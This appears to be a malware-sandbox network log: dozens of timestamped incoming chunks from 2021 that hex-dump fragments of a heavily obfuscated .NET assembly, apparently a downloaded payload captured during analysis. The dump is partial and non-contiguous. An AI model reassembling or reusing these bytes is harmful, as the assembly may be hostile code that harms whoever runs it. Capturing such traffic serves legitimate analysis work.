2021-09-27 18:36:57 UTC	214	IN	Data Raw: 00 58 9c 20 14 00 00 00 38 68 e5 ff ff 11 4b 1b 11 1f 18 91 9c 20 55 02 00 00 38 56 e5 ff ff 1c 8d 2d 00 00 01 13 83 20 74 00 00 00 38 44 e5 ff ff 16 13 24 20 f6 01 00 00 38 37 e5 ff ff 11 37 13 37 20 9f 01 00 00 28 d1 05 00 06 3a 24 e5 ff ff 26 38 1a e5 ff ff fe 0c 0a 00 20 11 00 00 00 fe 0c 00 00 9c 20 a2 01 00 00 38 06 e5 ff ff 11 37 11 68 61 13 36 20 f8 00 00 00 38 f5 e4 ff ff fe 0c 0a 00 20 0f 00 00 00 20 d4 00 00 00 20 46 00 00 00 59 9c 20 83 01 00 00 38 d6 e4 ff ff 7e c0 00 00 04 16 6a 8c 32 00 00 01 11 1e 8c 4a 00 00 02 28 b5 05 00 06 20 9e 02 00 00 38 b4 e4 ff ff 38 e9 f3 ff ff 20 a6 00 00 00 38 a5 e4 ff ff 17 80 b6 00 00 04 20 e2 00 00 00 38 95 e4 ff ff 20 89 00 00 00 20 3e 00 00 00 59 fe 0e 00 00 20 2d 02 00 00 38 7c e4 ff ff fe 0c 0a 00 20 0a Data Ascii: X 8hK U8V- t8D$ 8777 (:$&8 87ha6 8 FY 8~j2J( 88 8 8 >Y -8\|
2021-09-27 18:36:57 UTC	215	IN	Data Raw: 10 00 00 00 20 df 00 00 00 20 4a 00 00 00 59 9c 20 32 01 00 00 38 02 e0 ff ff 11 3c 11 7f 5d 13 54 20 52 02 00 00 38 f1 df ff ff 38 0b 30 00 00 20 12 01 00 00 28 d1 05 00 06 3a dd df ff ff 26 38 d3 df ff ff 11 2c 73 43 00 00 0a 11 41 28 d0 05 00 06 20 17 01 00 00 28 d1 05 00 06 3a ba df ff ff 26 38 b0 df ff ff 11 28 16 3e b0 ea ff ff 20 56 00 00 00 38 a2 df ff ff 11 76 28 9a 05 00 06 28 b2 05 00 06 11 76 28 9a 05 00 06 28 9c 05 00 06 17 6a 59 3c 39 0f 00 00 20 9a 01 00 00 38 78 df ff ff 38 d1 ff ff ff 20 1c 02 00 00 38 69 df ff ff 16 e0 13 5f 20 45 02 00 00 28 d1 05 00 06 39 56 df ff ff 26 20 a9 02 00 00 38 4b df ff ff 12 73 28 f4 00 00 0a 80 d3 00 00 04 20 5d 02 00 00 38 35 df ff ff fe 0c 0a 00 20 0d 00 00 00 fe 0c 00 00 9c 20 53 00 00 00 28 d1 05 00 06 Data Ascii: JY 28<]T R880 (:&8,sCA( (:&8(> V8v((v((jY<9 8x8 8i_ E(9V& 8Ks( ]85 S(
2021-09-27 18:36:57 UTC	217	IN	Data Raw: 05 00 06 3a bb da ff ff 26 38 b1 da ff ff fe 0c 04 00 20 0b 00 00 00 20 ea 00 00 00 20 4e 00 00 00 59 9c 20 66 01 00 00 38 96 da ff ff 20 ff 00 00 00 13 4f 20 7b 00 00 00 28 d1 05 00 06 39 80 da ff ff 26 20 9e 01 00 00 38 75 da ff ff 11 2a 28 bc 05 00 06 13 43 20 03 00 00 00 28 d2 05 00 06 3a 5d da ff ff 26 20 1e 00 00 00 38 52 da ff ff 11 1f 16 11 1f 8e 69 28 a1 05 00 06 20 af 00 00 00 28 d1 05 00 06 39 37 da ff ff 26 20 1a 02 00 00 38 2c da ff ff 28 87 05 00 06 1a 40 b9 1e 00 00 20 9d 01 00 00 38 17 da ff ff 16 13 23 20 2e 02 00 00 38 0a da ff ff fe 0c 0a 00 20 1d 00 00 00 fe 0c 00 00 9c 20 3c 00 00 00 38 f2 d9 ff ff 28 87 05 00 06 1a 40 f8 f6 ff ff 20 f0 00 00 00 38 dd d9 ff ff 17 13 10 20 22 02 00 00 38 d0 d9 ff ff fe 0c 0a 00 20 0f 00 00 00 20 46 00 Data Ascii: :&8 NY f8 O {(9& 8u*(C (:]& 8Ri( (97& 8,(@ 8# .8 <8(@ 8 "8 F
2021-09-27 18:36:57 UTC	218	IN	Data Raw: 20 80 00 00 00 fe 0e 21 00 38 58 d5 ff ff 20 b4 00 00 00 20 3c 00 00 00 59 fe 0e 00 00 20 14 02 00 00 38 43 d5 ff ff fe 0c 0a 00 20 16 00 00 00 20 ec 00 00 00 20 4e 00 00 00 59 9c 20 b6 00 00 00 28 d2 05 00 06 3a 1f d5 ff ff 26 20 d8 00 00 00 38 14 d5 ff ff 11 82 28 ac 05 00 06 13 62 20 84 00 00 00 fe 0e 21 00 38 f9 d4 ff ff 14 fe 06 1a 05 00 06 73 ea 05 00 06 80 ce 00 00 04 20 f6 00 00 00 38 e2 d4 ff ff 11 71 16 11 41 11 71 8e 69 28 7f 05 00 06 20 64 02 00 00 38 ca d4 ff ff 00 11 5a 73 43 00 00 0a d0 48 00 00 02 28 b6 05 00 06 28 bb 05 00 06 74 48 00 00 02 80 db 00 00 04 20 00 00 00 00 28 d1 05 00 06 3a 0a 00 00 00 26 38 00 00 00 00 fe 0c 7c 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 dd 73 25 00 00 26 20 00 00 00 00 28 d1 05 00 06 39 0f 00 00 00 26 20 Data Ascii: !8X <Y 8C NY (:& 8(b !8s 8qAqi( d8ZsCH((tH (:&8\|E8s%& (9&
2021-09-27 18:36:57 UTC	219	IN	Data Raw: 05 00 06 3a 09 d0 ff ff 26 38 ff cf ff ff 20 ed 00 00 00 20 4f 00 00 00 59 fe 0e 00 00 20 4a 02 00 00 38 ea cf ff ff 12 74 e0 73 f3 00 00 0a 16 28 78 05 00 06 26 20 05 00 00 00 28 d2 05 00 06 39 cc cf ff ff 26 20 00 00 00 00 38 c1 cf ff ff fe 0c 04 00 20 0a 00 00 00 20 ce 00 00 00 20 2b 00 00 00 58 9c 20 8a 02 00 00 28 d2 05 00 06 39 9d cf ff ff 26 38 93 cf ff ff 11 18 11 8a 3f 36 f6 ff ff 20 ef 00 00 00 38 84 cf ff ff 11 18 17 58 13 18 20 98 02 00 00 38 74 cf ff ff 12 1e fe 15 4a 00 00 02 20 61 02 00 00 38 62 cf ff ff 11 33 18 1f 63 9c 20 8a 01 00 00 fe 0e 21 00 38 4a cf ff ff 20 86 00 00 00 20 2c 00 00 00 59 fe 0e 00 00 20 a0 02 00 00 28 d1 05 00 06 3a 30 cf ff ff 26 38 26 cf ff ff 20 d4 00 00 00 20 46 00 00 00 59 fe 0e 79 00 20 1d 01 00 00 38 11 cf ff Data Ascii: :&8 OY J8ts(x& (9& 8 +X (9&8?6 8X 8tJ a8b3c !8J ,Y (:0&8& FYy 8
2021-09-27 18:36:57 UTC	223	IN	Data Raw: ff dc 20 3b 01 00 00 38 80 bf ff ff 11 76 28 a6 05 00 06 13 61 20 21 02 00 00 38 6d bf ff ff 11 64 16 3e 1e 03 00 00 20 9b 02 00 00 38 5b bf ff ff fe 0c 0a 00 20 0a 00 00 00 20 8d 00 00 00 20 62 00 00 00 58 9c 20 38 00 00 00 38 3c bf ff ff fe 0c 0a 00 20 02 00 00 00 20 29 00 00 00 20 07 00 00 00 58 9c 20 4c 00 00 00 38 1d bf ff ff fe 0c 0a 00 20 02 00 00 00 fe 0c 00 00 9c 20 5e 01 00 00 38 05 bf ff ff fe 0c 0a 00 20 0e 00 00 00 20 98 00 00 00 20 49 00 00 00 59 9c 20 db 01 00 00 38 e6 be ff ff 1f 1e 13 20 20 97 00 00 00 28 d2 05 00 06 39 d3 be ff ff 26 20 73 00 00 00 38 c8 be ff ff 7e da 00 00 04 28 a4 05 00 06 39 92 f1 ff ff 20 3c 02 00 00 38 af be ff ff 20 03 00 00 00 20 0f 00 00 00 58 fe 0e 79 00 20 e4 00 00 00 38 96 be ff ff fe 0c 0a 00 20 1f 00 00 00 Data Ascii: ;8v(a !8md> 8[ bX 88< ) X L8 ^8 IY 8 (9& s8~(9 <8 Xy 8
2021-09-27 18:36:57 UTC	227	IN	Data Raw: 00 0a 26 20 6f 01 00 00 38 fa ae ff ff 11 37 11 68 61 13 45 20 87 01 00 00 28 d1 05 00 06 3a e4 ae ff ff 26 38 da ae ff ff fe 0c 0a 00 20 0b 00 00 00 fe 0c 00 00 9c 20 4a 00 00 00 28 d1 05 00 06 3a c1 ae ff ff 26 38 b7 ae ff ff 11 13 11 17 11 4b 28 a9 05 00 06 13 44 20 99 02 00 00 28 d2 05 00 06 39 9f ae ff ff 26 20 88 02 00 00 38 94 ae ff ff 16 13 77 20 af 01 00 00 fe 0e 21 00 38 7f ae ff ff fe 0c 0a 00 20 15 00 00 00 fe 0c 00 00 9c 20 e3 00 00 00 38 6b ae ff ff 12 1e 16 7d dd 00 00 04 20 a9 01 00 00 38 59 ae ff ff fe 0c 0a 00 20 13 00 00 00 20 96 00 00 00 20 32 00 00 00 59 9c 20 84 02 00 00 38 3a ae ff ff 11 76 28 9a 05 00 06 28 b2 05 00 06 11 76 28 9a 05 00 06 28 9c 05 00 06 17 6a 59 3c aa ba ff ff 20 61 00 00 00 28 d1 05 00 06 3a 0b ae ff ff 26 20 47 Data Ascii: & o87haE (:&8 J(:&8K(D (9& 8w !8 8k} 8Y 2Y 8:v((v((jY< a(:& G
2021-09-27 18:36:57 UTC	228	IN	Data Raw: 78 01 00 00 38 f1 aa ff ff 20 24 00 00 00 20 04 00 00 00 58 fe 0e 79 00 20 71 02 00 00 38 d8 aa ff ff 12 80 fe 15 4a 00 00 02 20 d5 00 00 00 38 c6 aa ff ff 28 b8 05 00 06 11 83 28 b9 05 00 06 13 26 20 40 01 00 00 38 ae aa ff ff 11 3c 11 2e 17 59 40 9d c5 ff ff 20 62 02 00 00 38 99 aa ff ff fe 0c 0a 00 20 0e 00 00 00 20 26 00 00 00 20 48 00 00 00 58 9c 20 ae 01 00 00 38 7a aa ff ff fe 0c 0a 00 20 19 00 00 00 20 94 00 00 00 20 31 00 00 00 59 9c 20 b2 00 00 00 28 d2 05 00 06 39 56 aa ff ff 26 38 4c aa ff ff 7e da 00 00 04 28 a4 05 00 06 28 a5 05 00 06 39 15 dd ff ff 20 67 01 00 00 38 32 aa ff ff 12 73 28 f4 00 00 0a 80 d7 00 00 04 20 bc 00 00 00 28 d1 05 00 06 39 17 aa ff ff 26 20 da 01 00 00 38 0c aa ff ff fe 0c 0a 00 20 0a 00 00 00 20 52 00 00 00 20 71 00 Data Ascii: x8 $ Xy q8J 8((& @8<.Y@ b8 & HX 8z 1Y (9V&8L~((9 g82s( (9& 8 R q
2021-09-27 18:36:57 UTC	233	IN	Data Raw: 01 00 0a 6f f7 00 00 0a 28 fc 00 00 0a 39 27 00 00 00 02 6f f6 00 00 0a 72 16 04 00 70 6f 00 01 00 0a 02 16 8d 16 00 00 01 6f 01 01 00 0a 6f f7 00 00 0a 0a dd 11 00 00 00 dd 06 00 00 00 26 dd 00 00 00 00 72 86 02 00 70 2a 06 2a 00 00 00 01 28 00 00 00 00 00 00 2b 2b 00 06 16 00 00 01 00 00 31 00 5d 8e 00 06 16 00 00 01 00 00 94 00 57 eb 00 06 16 00 00 01 13 30 05 00 56 00 00 00 60 00 00 11 7e bc 00 00 04 3a 3e 00 00 00 28 28 05 00 06 72 28 04 00 70 6f e7 00 00 0a 72 34 04 00 70 28 02 01 00 0a 28 21 05 00 06 0a 06 20 4c 00 00 02 28 23 06 00 06 28 a2 00 00 0a 28 03 01 00 0a 74 4c 00 00 02 80 bc 00 00 04 7e bc 00 00 04 02 03 04 6f 00 06 00 06 2a 00 00 13 30 06 00 57 00 00 00 60 00 00 11 7e d8 00 00 04 3a 3e 00 00 00 28 28 05 00 06 72 48 04 00 70 6f e7 00 00 Data Ascii: o(9'orpooo&rp*(++1]W0V`~:>((r(por4p((! L(#((tL~o0W`~:>((rHpo
2021-09-27 18:36:57 UTC	237	IN	Data Raw: 03 00 6f 52 01 00 0a 2a 00 00 46 2b 05 28 19 c1 55 6d fe 09 00 00 6f c0 00 00 0a 2a 00 00 1a 28 1e 05 00 06 2a 00 1a 28 1e 05 00 06 2a 00 1a 28 1e 05 00 06 2a 00 1a 28 1e 05 00 06 2a 00 1a 28 1e 05 00 06 2a 00 1a 28 1e 05 00 06 2a 00 1a 28 1e 05 00 06 2a 00 1b 30 03 00 15 01 00 00 69 00 00 11 2b 05 28 74 12 39 60 20 03 00 00 00 fe 0e 01 00 38 00 00 00 00 fe 0c 01 00 45 05 00 00 00 c8 00 00 00 05 00 00 00 c9 00 00 00 25 00 00 00 39 00 00 00 38 c3 00 00 00 17 80 e1 00 00 04 20 04 00 00 00 28 22 06 00 06 39 cd ff ff ff 26 20 01 00 00 00 38 c2 ff ff ff 7e e1 00 00 04 39 d6 ff ff ff 20 02 00 00 00 38 ae ff ff ff 00 20 c9 5d 3e 40 20 87 5d 3e 40 61 28 20 06 00 06 7e 07 02 00 04 28 3d 08 00 06 26 20 00 00 00 00 28 21 06 00 06 3a 0a 00 00 00 26 38 00 00 00 00 fe Data Ascii: oRF+(Umo(((((((*0i+(t9` 8E%98 ("9& 8~9 8 ]>@ ]>@a( ~(=& (!:&8
2021-09-27 18:36:57 UTC	241	IN	Data Raw: ff 20 11 00 00 00 20 39 00 00 00 58 fe 0e 18 00 20 b7 01 00 00 28 41 06 00 06 39 83 f2 ff ff 26 38 79 f2 ff ff fe 0c 13 00 20 06 00 00 00 20 a5 00 00 00 20 37 00 00 00 59 9c 20 f4 00 00 00 38 5e f2 ff ff fe 0c 13 00 20 0e 00 00 00 20 8f 00 00 00 20 76 00 00 00 59 9c 20 81 01 00 00 28 41 06 00 06 39 3a f2 ff ff 26 20 62 01 00 00 38 2f f2 ff ff fe 0c 13 00 20 16 00 00 00 fe 0c 2a 00 9c 20 86 01 00 00 28 40 06 00 06 3a 12 f2 ff ff 26 38 08 f2 ff ff fe 0c 13 00 20 1f 00 00 00 fe 0c 2a 00 9c 20 0a 01 00 00 38 f4 f1 ff ff 2a 20 d2 00 00 00 20 46 00 00 00 59 fe 0e 18 00 20 4c 01 00 00 38 da f1 ff ff 20 6f 00 00 00 20 0c 00 00 00 58 fe 0e 2a 00 20 8c 00 00 00 38 c1 f1 ff ff 11 07 11 28 17 59 40 3a 00 00 00 20 19 01 00 00 38 ac f1 ff ff fe 0c 13 00 20 11 00 00 00 Data Ascii: 9X (A9&8y 7Y 8^ vY (A9:& b8/ * (@:&8 * 8* FY L8 o X* 8(Y@: 8
2021-09-27 18:36:57 UTC	245	IN	Data Raw: e2 ff ff 11 17 17 58 13 17 20 71 00 00 00 38 0a e2 ff ff fe 0c 13 00 20 1c 00 00 00 20 6e 00 00 00 20 17 00 00 00 58 9c 20 f0 00 00 00 fe 0e 0b 00 38 e3 e1 ff ff fe 0c 10 00 20 0e 00 00 00 20 66 00 00 00 20 02 00 00 00 59 9c 20 bb 00 00 00 28 41 06 00 06 39 c3 e1 ff ff 26 20 53 00 00 00 38 b8 e1 ff ff 20 0c 00 00 00 20 1b 00 00 00 58 fe 0e 2a 00 20 17 01 00 00 28 40 06 00 06 3a 9a e1 ff ff 26 20 d8 00 00 00 38 8f e1 ff ff 20 fd 00 00 00 20 54 00 00 00 59 fe 0e 2a 00 20 9f 01 00 00 38 76 e1 ff ff 20 e4 00 00 00 20 4c 00 00 00 59 fe 0e 2a 00 20 db 00 00 00 28 40 06 00 06 3a 58 e1 ff ff 26 38 4e e1 ff ff fe 0c 13 00 20 01 00 00 00 20 a0 00 00 00 20 35 00 00 00 59 9c 20 56 01 00 00 28 40 06 00 06 3a 2e e1 ff ff 26 20 6b 00 00 00 38 23 e1 ff ff fe 0c 13 00 20 Data Ascii: X q8 n X 8 f Y (A9& S8 X* (@:& 8 TY* 8v LY* (@:X&8N 5Y V(@:.& k8#
2021-09-27 18:36:57 UTC	249	IN	Data Raw: 06 39 92 d1 ff ff 26 38 88 d1 ff ff 20 54 00 00 00 20 71 00 00 00 58 fe 0e 2a 00 20 a0 00 00 00 38 73 d1 ff ff fe 0c 13 00 20 0d 00 00 00 fe 0c 2a 00 9c 20 78 01 00 00 28 40 06 00 06 3a 56 d1 ff ff 26 38 4c d1 ff ff fe 0c 10 00 20 0d 00 00 00 fe 0c 2c 00 9c 20 7f 00 00 00 38 38 d1 ff ff 20 47 00 00 00 20 0c 00 00 00 58 fe 0e 2c 00 20 6f 01 00 00 38 1f d1 ff ff 20 7f 00 00 00 20 2a 00 00 00 59 fe 0e 2a 00 20 28 01 00 00 38 06 d1 ff ff 11 07 17 58 13 07 20 73 00 00 00 38 f6 d0 ff ff 11 0f 13 16 20 6e 00 00 00 38 e8 d0 ff ff 11 37 1e 62 13 37 20 b1 00 00 00 38 d8 d0 ff ff 11 1a 1e 62 13 1a 20 84 00 00 00 38 c8 d0 ff ff 20 64 00 00 00 20 49 00 00 00 58 fe 0e 2a 00 20 d9 00 00 00 38 af d0 ff ff fe 0c 13 00 20 1c 00 00 00 fe 0c 18 00 9c 20 06 00 00 00 28 40 06 Data Ascii: 9&8 T qX* 8s * x(@:V&8L , 88 G X, o8 Y (8X s8 n87b7 8b 8 d IX* 8 (@
2021-09-27 18:36:57 UTC	253	IN	Data Raw: 05 28 c6 c9 20 63 fe 09 00 00 6f 06 01 00 0a 2a 00 00 46 2b 05 28 98 eb 1a 5b fe 09 00 00 6f 5f 01 00 0a 2a 00 00 5a 2b 05 28 9f 1b 3f 57 00 fe 09 00 00 fe 09 01 00 28 4b 06 00 06 2a 00 46 2b 05 28 60 73 78 4d fe 09 00 00 6f 57 01 00 0a 2a 00 00 32 2b 05 28 c8 9c 34 5a 14 14 fe 01 2a 00 00 00 26 2b 05 28 e2 38 0e 65 14 2a 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 16 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 16 2a 12 00 00 16 2a 00 00 00 13 30 05 00 04 00 00 00 00 00 00 00 00 00 16 2a 13 30 06 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 Data Ascii: ( coF+([o_Z+(?W(KF+(`sxMoW2+(4Z&+(8e00000000*0
2021-09-27 18:36:57 UTC	257	IN	Data Raw: 28 15 05 00 06 2a 00 00 00 56 2b 05 28 b2 d4 5f 51 0e 03 0e 00 0e 01 0e 02 6f b0 07 00 06 2a 00 00 42 28 1e 05 00 06 d0 b5 00 00 02 28 15 05 00 06 2a 00 00 00 4e 2b 05 28 7f 09 29 37 0e 02 0e 00 0e 01 6f b4 07 00 06 2a 42 28 1e 05 00 06 d0 b6 00 00 02 28 15 05 00 06 2a 00 00 00 56 2b 05 28 8d 98 52 69 0e 03 0e 00 0e 01 0e 02 6f b8 07 00 06 2a 00 00 42 28 1e 05 00 06 d0 b7 00 00 02 28 15 05 00 06 2a 00 00 00 4e 2b 05 28 38 da 30 34 0e 02 0e 00 0e 01 6f bc 07 00 06 2a 42 28 1e 05 00 06 d0 b8 00 00 02 28 15 05 00 06 2a 00 00 00 4e 2b 05 28 ef 7c 3f 49 0e 02 0e 00 0e 01 6f c0 07 00 06 2a 42 28 1e 05 00 06 d0 b9 00 00 02 28 15 05 00 06 2a 00 00 00 4e 2b 05 28 99 91 3b 59 0e 02 0e 00 0e 01 6f c4 07 00 06 2a 42 28 1e 05 00 06 d0 ba 00 00 02 28 15 05 00 06 2a 00 Data Ascii: (V+(_QoB((N+()7oB((V+(RioB((N+(804oB((N+(\|?IoB((N+(;YoB((*
2021-09-27 18:36:57 UTC	260	IN	Data Raw: 00 00 0f 06 00 00 78 00 47 00 4a 02 03 00 00 00 23 06 00 00 78 00 4a 00 e0 02 05 01 00 00 37 06 00 00 69 00 4d 00 5b 03 05 01 00 00 50 06 00 00 69 00 4e 00 5b 03 03 00 00 00 64 06 00 00 6d 00 4f 00 5b 03 03 00 00 00 82 06 00 00 6d 00 50 00 61 03 05 00 00 00 96 06 00 00 59 00 51 00 6a 03 85 00 00 00 aa 06 00 00 74 00 54 00 73 03 05 00 00 00 be 06 00 00 a4 00 55 00 7e 03 05 00 00 00 d2 06 00 00 a4 00 58 00 95 03 05 00 00 00 e6 06 00 00 a4 00 5b 00 ac 03 05 00 00 00 fa 06 00 00 a4 00 5e 00 c3 03 05 00 00 00 0e 07 00 00 a4 00 61 00 d9 03 05 00 00 00 22 07 00 00 59 00 64 00 f3 03 05 00 00 00 36 07 00 00 59 00 68 00 fb 03 05 00 00 00 4a 07 00 00 59 00 6d 00 03 04 05 00 00 00 5e 07 00 00 59 00 71 00 0b 04 05 00 00 00 72 07 00 00 59 00 78 00 11 04 03 00 00 00 86 Data Ascii: xGJ#xJ7iM[PiN[dmO[mPaYQjtTsU~X[^a"Yd6YhJYm^YqrYx
2021-09-27 18:36:57 UTC	265	IN	Data Raw: 00 e6 7b ed 06 13 00 09 7c ed 06 13 00 2c 7c ed 06 13 00 4f 7c ed 06 13 00 72 7c ed 06 13 00 95 7c ed 06 13 00 b8 7c ed 06 13 00 db 7c ed 06 13 00 fe 7c ed 06 13 00 21 7d ed 06 13 00 44 7d ed 06 13 00 67 7d ed 06 13 00 8a 7d ed 06 13 00 ad 7d ed 06 13 00 d0 7d ed 06 13 00 f3 7d ed 06 13 00 16 7e ed 06 13 00 39 7e ed 06 13 00 5c 7e ed 06 13 00 7f 7e ed 06 13 00 a2 7e ed 06 13 00 c5 7e ed 06 13 00 e8 7e ed 06 13 00 0b 7f ed 06 13 00 2e 7f ed 06 13 00 51 7f ed 06 13 00 74 7f ed 06 13 00 97 7f ed 06 13 00 ba 7f ed 06 13 00 dd 7f ed 06 13 00 00 80 ed 06 13 00 23 80 ed 06 13 00 46 80 ed 06 13 00 69 80 ed 06 13 00 8c 80 ed 06 13 00 af 80 ed 06 13 00 d2 80 ed 06 13 00 f5 80 ed 06 13 00 18 81 ed 06 13 00 3b 81 ed 06 13 00 5e 81 ed 06 13 00 81 81 ed 06 13 00 a4 81 Data Ascii: {\|,\|O\|r\|\|\|\|\|!}D}g}}}}}~9~\~~~~~.Qt#Fi;^
2021-09-27 18:36:57 UTC	269	IN	Data Raw: db 00 08 32 00 00 08 00 c3 03 7f 25 08 08 db 00 00 00 00 00 00 00 c3 07 8a 25 0c 08 db 00 10 32 00 00 08 00 c3 03 95 25 08 08 dc 00 18 32 00 00 08 00 83 18 3f 00 12 08 dc 00 00 00 00 00 00 00 c3 07 a0 25 19 08 dd 00 00 00 00 00 00 00 c3 07 ab 25 1f 08 de 00 00 00 00 00 00 00 c3 07 b6 25 1f 08 df 00 00 00 00 00 00 00 c3 07 c1 25 08 08 e0 00 00 00 00 00 00 00 c3 07 cc 25 25 08 e0 00 28 32 00 00 08 00 c3 03 d7 25 08 08 e0 00 00 00 00 00 00 00 c3 07 e2 25 0c 08 e0 00 30 32 00 00 08 00 93 00 ed 25 2a 08 e1 00 44 32 00 00 08 00 93 00 f8 25 32 08 e2 00 54 32 00 00 08 00 91 00 18 26 76 08 e4 00 64 32 00 00 08 00 91 00 23 26 85 08 e5 00 74 32 00 00 08 00 91 18 66 15 0e 01 e6 00 f4 32 00 00 08 00 93 00 2e 26 0e 01 e6 00 fc 32 00 00 08 00 93 00 42 26 19 01 e6 00 04 Data Ascii: 2%%2%2?%%%%%%(2%%02%*D2%2T2&vd2#&t2f2.&2B&
2021-09-27 18:36:57 UTC	273	IN	Data Raw: 01 88 3c 00 00 08 00 c6 00 52 28 aa 08 3b 01 90 3c 00 00 08 00 c6 00 5d 28 aa 08 3b 01 98 3c 00 00 08 00 c6 00 68 28 aa 08 3b 01 a0 3c 00 00 08 00 c6 00 73 28 aa 08 3b 01 a8 3c 00 00 08 00 c6 00 7e 28 aa 08 3b 01 b0 3c 00 00 08 00 c6 00 89 28 aa 08 3b 01 b8 3c 00 00 08 00 c6 00 94 28 af 08 3b 01 c0 3c 00 00 08 00 c6 00 9f 28 af 08 3b 01 c8 3c 00 00 08 00 c6 00 aa 28 b5 08 3b 01 d0 3c 00 00 08 00 c6 00 b5 28 b5 08 3b 01 d8 3c 00 00 08 00 c6 00 c0 28 b5 08 3b 01 e0 3c 00 00 08 00 c6 00 cb 28 bb 08 3b 01 f0 3c 00 00 08 00 c6 00 d6 28 bb 08 3b 01 00 3d 00 00 08 00 c6 00 e1 28 bb 08 3b 01 10 3d 00 00 08 00 c6 00 ec 28 bb 08 3b 01 20 3d 00 00 08 00 c6 00 f7 28 bb 08 3b 01 30 3d 00 00 08 00 c6 00 02 29 bb 08 3b 01 40 3d 00 00 08 00 c6 00 0d 29 25 08 3b 01 48 3d Data Ascii: <R(;<](;<h(;<s(;<~(;<(;<(;<(;<(;<(;<(;<(;<(;=(;=(; =(;0=);@=)%;H=
2021-09-27 18:36:57 UTC	277	IN	Data Raw: d0 4a 00 00 08 00 c6 00 91 29 c1 08 a3 01 e0 4a 00 00 08 00 c6 00 9c 29 c1 08 a4 01 f0 4a 00 00 08 00 c6 00 a7 29 c1 08 a5 01 f8 4a 00 00 08 00 c6 00 b2 29 c1 08 a6 01 00 4b 00 00 08 00 c6 00 bd 29 25 08 a7 01 08 4b 00 00 08 00 c6 00 c8 29 c1 08 a7 01 10 4b 00 00 08 00 c6 00 de 29 c1 08 a8 01 18 4b 00 00 08 00 c6 00 e9 29 c1 08 a9 01 20 4b 00 00 08 00 c6 00 f4 29 c1 08 aa 01 28 4b 00 00 08 00 c3 02 cc 25 25 08 ab 01 30 4b 00 00 08 00 c3 02 ab 25 1f 08 ab 01 40 4b 00 00 08 00 c3 02 b6 25 1f 08 ac 01 50 4b 00 00 08 00 c6 00 ff 29 1f 08 ad 01 60 4b 00 00 08 00 c6 00 0a 2a 1f 08 ae 01 70 4b 00 00 08 00 c6 00 15 2a 1f 08 af 01 80 4b 00 00 08 00 c6 00 20 2a 1f 08 b0 01 90 4b 00 00 08 00 c6 00 2b 2a 1f 08 b1 01 a0 4b 00 00 08 00 c6 00 36 2a 1f 08 b2 01 b0 4b 00 Data Ascii: J)J)J)J)K)%K)K)K) K)(K%%0K%@K%PK)`KpKK K+K6*K
2021-09-27 18:36:57 UTC	281	IN	Data Raw: 60 00 00 08 00 91 00 c2 49 00 0e 2b 02 38 60 00 00 08 00 91 00 e3 49 00 0e 2e 02 48 60 00 00 08 00 91 00 f5 49 7e 0e 31 02 58 60 00 00 08 00 91 00 6b 4a 76 08 33 02 68 60 00 00 08 00 91 00 76 4a 85 08 34 02 78 60 00 00 08 00 91 00 81 4a 6f 04 35 02 9c 60 00 00 08 00 91 00 8c 4a 46 05 36 02 c8 60 00 00 08 00 91 00 97 4a be 0e 37 02 d8 60 00 00 08 00 91 00 b2 4a d2 0e 3a 02 e8 60 00 00 08 00 86 18 3f 00 a5 00 3d 02 f8 60 00 00 08 00 91 00 c3 4a e6 0e 3d 02 00 61 00 00 08 00 91 18 66 15 0e 01 3f 02 2c 62 00 00 08 00 93 00 ce 4a 19 01 3f 02 34 62 00 00 08 00 93 00 e2 4a ec 0e 3f 02 3c 62 00 00 08 00 93 00 f6 4a bc 07 3f 02 44 62 00 00 08 00 93 00 0a 4b bc 07 3f 02 4c 62 00 00 08 00 93 00 24 4b dd 07 3f 02 54 62 00 00 08 00 93 00 38 4b 21 09 3f 02 5c 62 00 00 Data Ascii: `I+8`I.H`I~1X`kJv3h`vJ4x`Jo5`JF6`J7`J:`?=`J=af?,bJ?4bJ?<bJ?DbK?Lb$K?Tb8K!?\b
2021-09-27 18:36:57 UTC	285	IN	Data Raw: 01 00 08 00 93 00 5a 66 0e 01 d3 02 6c 32 01 00 08 00 93 00 6e 66 23 02 d3 02 74 32 01 00 08 00 93 00 94 66 46 05 d3 02 80 32 01 00 08 00 93 00 b7 66 6f 04 d3 02 8c 32 01 00 08 00 93 00 db 66 de 13 d3 02 a0 32 01 00 08 00 93 00 ef 66 22 14 d5 02 b0 32 01 00 08 00 93 00 03 67 0e 01 d5 02 b8 32 01 00 08 00 93 00 17 67 7e 12 d5 02 c0 32 01 00 08 00 93 00 2b 67 35 15 d5 02 d0 32 01 00 08 00 93 00 3f 67 43 15 d5 02 e0 32 01 00 08 00 93 00 53 67 46 05 d5 02 ec 32 01 00 08 00 93 00 73 67 46 05 d5 02 f8 32 01 00 08 00 93 00 9e 67 46 05 d5 02 04 33 01 00 08 00 93 00 b2 67 46 05 d5 02 10 33 01 00 08 00 93 00 d5 67 46 05 d5 02 1c 33 01 00 08 00 93 00 f1 67 2d 09 d5 02 2c 33 01 00 08 00 93 00 05 68 46 05 d5 02 38 33 01 00 08 00 93 00 3d 68 dd 07 d5 02 44 33 01 00 08 Data Ascii: Zfl2nf#t2fF2fo2f2f"2g2g~2+g52?gC2SgF2sgF2gF3gF3gF3g-,3hF83=hD3
2021-09-27 18:36:57 UTC	289	IN	Data Raw: 00 03 00 06 18 3f 00 33 03 72 03 30 81 01 00 08 00 10 18 66 15 0e 01 72 03 00 00 00 00 03 00 46 00 21 1f 0c 1a 72 03 44 81 01 00 08 00 16 00 d0 87 12 1a 72 03 00 00 00 00 03 00 06 18 3f 00 33 03 72 03 54 81 01 00 08 00 10 18 66 15 0e 01 72 03 00 00 00 00 03 00 46 00 21 1f 20 1a 72 03 68 81 01 00 08 00 16 00 d0 87 27 1a 72 03 00 00 00 00 03 00 06 18 3f 00 33 03 72 03 7c 81 01 00 08 00 10 18 66 15 0e 01 72 03 00 00 00 00 03 00 46 00 21 1f 36 1a 72 03 90 81 01 00 08 00 16 00 d0 87 3d 1a 72 03 00 00 00 00 03 00 06 18 3f 00 33 03 72 03 a4 81 01 00 08 00 10 18 66 15 0e 01 72 03 00 00 00 00 03 00 46 00 21 1f 37 04 72 03 b8 81 01 00 08 00 16 00 d0 87 4c 